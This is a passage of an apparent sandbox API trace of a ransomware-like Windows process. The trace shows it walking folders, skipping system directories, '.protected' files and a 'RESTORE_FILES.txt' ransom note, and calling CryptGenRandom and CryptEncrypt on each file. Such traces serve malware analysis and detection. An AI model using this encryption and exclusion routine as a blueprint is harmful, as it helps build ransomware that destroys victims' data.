FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.135] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.135] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.135] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.135] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.135] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.135] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\RESTORE_FILES.txt") returned 70 [0093.135] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.135] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.135] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.135] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="Windows") returned -1 [0093.135] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="Program Files") returned -1 [0093.135] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="Program Files (x86)") returned -1 [0093.135] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="$Recycle.bin") returned 1 [0093.135] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="System Volume Information") returned -1 [0093.135] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned 91 [0093.135] lstrcmpW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2=".") returned 1 [0093.135] lstrcmpW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="..") returned 1 [0093.136] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*") returned 93 [0093.136] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.136] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.136] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.136] lstrcmpiW (lpString1=".", 
lpString2="Program Files (x86)") returned -1 [0093.136] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.136] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.136] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\.") returned 93 [0093.136] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.136] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.136] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.136] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.136] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.136] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.136] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.136] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\..") returned 94 [0093.136] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.136] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.136] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.136] lstrcmpiW (lpString1="background.png", lpString2="Windows") returned -1 [0093.136] lstrcmpiW (lpString1="background.png", lpString2="Program Files") returned -1 [0093.136] lstrcmpiW (lpString1="background.png", lpString2="Program Files (x86)") returned -1 [0093.136] lstrcmpiW (lpString1="background.png", lpString2="$Recycle.bin") returned 1 [0093.136] lstrcmpiW (lpString1="background.png", lpString2="System Volume Information") returned -1 [0093.136] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png") returned 106 [0093.136] StrStrIW (lpFirst="background.png", lpSrch=".protected") returned 0x0 [0093.136] lstrcmpW (lpString1="background.png", lpString2="RESTORE_FILES.txt") returned -1 [0093.136] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.136] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.136] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.136] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.136] lstrcmpiW (lpString1="behavior.xml", lpString2="Windows") returned -1 [0093.136] lstrcmpiW (lpString1="behavior.xml", lpString2="Program Files") returned -1 [0093.137] lstrcmpiW (lpString1="behavior.xml", lpString2="Program Files (x86)") returned -1 [0093.137] lstrcmpiW (lpString1="behavior.xml", lpString2="$Recycle.bin") returned 1 [0093.137] lstrcmpiW (lpString1="behavior.xml", lpString2="System Volume Information") returned -1 [0093.137] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml") returned 104 [0093.137] StrStrIW (lpFirst="behavior.xml", lpSrch=".protected") returned 0x0 [0093.137] lstrcmpW (lpString1="behavior.xml", 
lpString2="RESTORE_FILES.txt") returned -1 [0093.137] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.137] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.137] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.137] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.137] lstrcmpiW (lpString1="device.png", lpString2="Windows") returned -1 [0093.137] lstrcmpiW (lpString1="device.png", lpString2="Program Files") returned -1 [0093.137] lstrcmpiW (lpString1="device.png", lpString2="Program Files (x86)") returned -1 [0093.137] lstrcmpiW (lpString1="device.png", lpString2="$Recycle.bin") returned 1 [0093.137] lstrcmpiW (lpString1="device.png", lpString2="System Volume Information") returned -1 [0093.137] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png") returned 102 [0093.137] StrStrIW (lpFirst="device.png", lpSrch=".protected") returned 0x0 [0093.137] lstrcmpW (lpString1="device.png", lpString2="RESTORE_FILES.txt") returned -1 [0093.137] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.137] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: 
pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.137] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.137] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.137] lstrcmpiW (lpString1="overlay.png", lpString2="Windows") returned -1 [0093.137] lstrcmpiW (lpString1="overlay.png", lpString2="Program Files") returned -1 [0093.137] lstrcmpiW (lpString1="overlay.png", lpString2="Program Files (x86)") returned -1 [0093.137] lstrcmpiW (lpString1="overlay.png", lpString2="$Recycle.bin") returned 1 [0093.137] lstrcmpiW (lpString1="overlay.png", lpString2="System Volume Information") returned -1 [0093.137] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png") returned 103 [0093.137] StrStrIW (lpFirst="overlay.png", lpSrch=".protected") returned 0x0 [0093.137] lstrcmpW (lpString1="overlay.png", lpString2="RESTORE_FILES.txt") returned -1 [0093.137] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.137] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.137] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\users\\all users\\microsoft\\device 
stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.138] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.138] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.138] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.138] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.138] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.138] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.138] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\RESTORE_FILES.txt") returned 109 [0093.138] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.138] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.138] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.138] lstrcmpiW (lpString1="superbar.png", lpString2="Windows") returned -1 [0093.138] lstrcmpiW (lpString1="superbar.png", lpString2="Program Files") returned 1 [0093.138] lstrcmpiW (lpString1="superbar.png", lpString2="Program Files (x86)") returned 1 [0093.138] lstrcmpiW (lpString1="superbar.png", lpString2="$Recycle.bin") returned 1 [0093.138] lstrcmpiW (lpString1="superbar.png", lpString2="System Volume Information") returned -1 [0093.138] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png") 
returned 104 [0093.138] StrStrIW (lpFirst="superbar.png", lpSrch=".protected") returned 0x0 [0093.138] lstrcmpW (lpString1="superbar.png", lpString2="RESTORE_FILES.txt") returned 1 [0093.138] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.138] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.138] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.138] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.138] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.138] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\RESTORE_FILES.txt") returned 109 [0093.138] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.138] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.138] lstrcmpiW 
(lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="Windows") returned -1 [0093.138] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="Program Files") returned -1 [0093.138] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="Program Files (x86)") returned -1 [0093.139] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="$Recycle.bin") returned 1 [0093.139] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="System Volume Information") returned -1 [0093.139] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned 91 [0093.139] lstrcmpW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2=".") returned 1 [0093.139] lstrcmpW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="..") returned 1 [0093.139] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*") returned 93 [0093.139] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.139] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.139] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.139] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.139] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.139] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.139] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\.") returned 93 
[0093.139] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.139] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.139] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.139] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.139] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.139] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.139] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.139] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\..") returned 94 [0093.139] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.139] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.139] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.139] lstrcmpiW (lpString1="background.png", lpString2="Windows") returned -1 [0093.139] lstrcmpiW (lpString1="background.png", lpString2="Program Files") returned -1 [0093.139] lstrcmpiW (lpString1="background.png", lpString2="Program Files (x86)") returned -1 [0093.139] lstrcmpiW (lpString1="background.png", lpString2="$Recycle.bin") returned 1 [0093.139] lstrcmpiW (lpString1="background.png", lpString2="System Volume Information") returned -1 [0093.139] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png") returned 106 [0093.139] StrStrIW (lpFirst="background.png", lpSrch=".protected") returned 0x0 [0093.139] lstrcmpW (lpString1="background.png", lpString2="RESTORE_FILES.txt") returned -1 [0093.139] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 
1 [0093.139] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.140] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.140] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.140] lstrcmpiW (lpString1="behavior.xml", lpString2="Windows") returned -1 [0093.140] lstrcmpiW (lpString1="behavior.xml", lpString2="Program Files") returned -1 [0093.140] lstrcmpiW (lpString1="behavior.xml", lpString2="Program Files (x86)") returned -1 [0093.140] lstrcmpiW (lpString1="behavior.xml", lpString2="$Recycle.bin") returned 1 [0093.140] lstrcmpiW (lpString1="behavior.xml", lpString2="System Volume Information") returned -1 [0093.140] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml") returned 104 [0093.140] StrStrIW (lpFirst="behavior.xml", lpSrch=".protected") returned 0x0 [0093.140] lstrcmpW (lpString1="behavior.xml", lpString2="RESTORE_FILES.txt") returned -1 [0093.140] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.140] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.140] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.140] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.140] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.140] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.140] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.140] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.140] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.140] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\RESTORE_FILES.txt") returned 109 [0093.140] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.140] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.140] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.140] lstrcmpiW (lpString1="watermark.png", lpString2="Windows") returned -1 [0093.140] lstrcmpiW (lpString1="watermark.png", lpString2="Program Files") returned 1 [0093.140] lstrcmpiW (lpString1="watermark.png", lpString2="Program Files (x86)") returned 1 [0093.140] lstrcmpiW (lpString1="watermark.png", lpString2="$Recycle.bin") returned 1 [0093.140] lstrcmpiW (lpString1="watermark.png", lpString2="System Volume Information") returned 1 [0093.140] wnsprintfW (in: pszDest=0x4cfb68, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png") returned 105 [0093.140] StrStrIW (lpFirst="watermark.png", lpSrch=".protected") returned 0x0 [0093.140] lstrcmpW (lpString1="watermark.png", lpString2="RESTORE_FILES.txt") returned 1 [0093.141] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.141] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.141] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.141] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.141] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.141] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\RESTORE_FILES.txt") returned 109 [0093.141] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.141] 
FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.141] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.142] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\RESTORE_FILES.txt") returned 70 [0093.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.142] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.142] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.142] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.142] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.142] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.142] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.142] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\RESTORE_FILES.txt") returned 63 [0093.142] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.142] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.142] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.142] lstrcmpiW (lpString1="Task", lpString2="Windows") returned -1 [0093.142] lstrcmpiW (lpString1="Task", lpString2="Program Files") returned 1 [0093.142] lstrcmpiW 
